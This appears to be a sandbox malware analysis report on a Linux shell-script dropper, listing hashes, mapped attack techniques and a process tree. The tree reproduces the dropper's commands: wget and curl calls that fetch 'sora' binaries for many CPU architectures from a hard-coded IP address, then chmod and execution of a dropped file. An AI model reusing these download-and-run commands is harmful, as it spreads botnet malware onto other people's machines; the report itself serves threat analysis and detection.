Analysis
-
max time kernel
4s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:26
Static task
static1
Behavioral task
behavioral1
Sample
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
-
Size
2KB
-
MD5
1d363d0224de71500a06aaf7e205d0bb
-
SHA1
13fe03fe502546c5b53e156db53090275844d2ba
-
SHA256
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8
-
SHA512
6030ceebdd5f6f16cbf10c1f30dfaf057d7f533dd156dc03c28c93920350407f5b3aebc4e09f2a74fdf2f155c7027001aed4d892ce0f83fb8b54b87a5212ddde
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1521 chmod 1554 chmod 1560 chmod 1578 chmod 1596 chmod 1536 chmod 1566 chmod 1572 chmod 1584 chmod 1542 chmod 1548 chmod 1590 chmod 1530 chmod 1602 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1522 robben /tmp/robben 1531 robben /tmp/robben 1537 robben /tmp/robben 1543 robben /tmp/robben 1549 robben /tmp/robben 1555 robben /tmp/robben 1561 robben /tmp/robben 1567 robben /tmp/robben 1573 robben /tmp/robben 1579 robben /tmp/robben 1585 robben /tmp/robben 1591 robben /tmp/robben 1597 robben /tmp/robben 1603 robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1524 wget 1528 curl 1529 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Processes
-
/tmp/a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh/tmp/a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh1⤵
- Writes file to tmp directory
PID:1517 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:1518
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵PID:1519
-
-
/bin/catcat sora.x862⤵PID:1520
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1522
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1524
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1528
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:1529
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1531
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:1533
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵PID:1534
-
-
/bin/catcat sora.x86_642⤵PID:1535
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1537
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:1539
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵PID:1540
-
-
/bin/catcat sora.i4682⤵PID:1541
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1543
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:1545
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵PID:1546
-
-
/bin/catcat sora.i6862⤵PID:1547
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1549
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:1551
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵PID:1552
-
-
/bin/catcat sora.mpsl2⤵PID:1553
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1555
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:1557
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵PID:1558
-
-
/bin/catcat sora.arm42⤵PID:1559
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1561
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:1563
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵PID:1564
-
-
/bin/catcat sora.arm52⤵PID:1565
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1567
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:1569
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵PID:1570
-
-
/bin/catcat sora.arm62⤵PID:1571
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1573
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:1575
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵PID:1576
-
-
/bin/catcat sora.arm72⤵PID:1577
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1579
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:1581
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵PID:1582
-
-
/bin/catcat sora.ppc2⤵PID:1583
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1585
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1587
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1588
-
-
/bin/catcat sora.ppc440fp2⤵PID:1589
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1591
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:1593
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵PID:1594
-
-
/bin/catcat sora.m68k2⤵PID:1595
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1597
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:1599
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵PID:1600
-
-
/bin/catcat sora.sh42⤵PID:1601
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:1603
-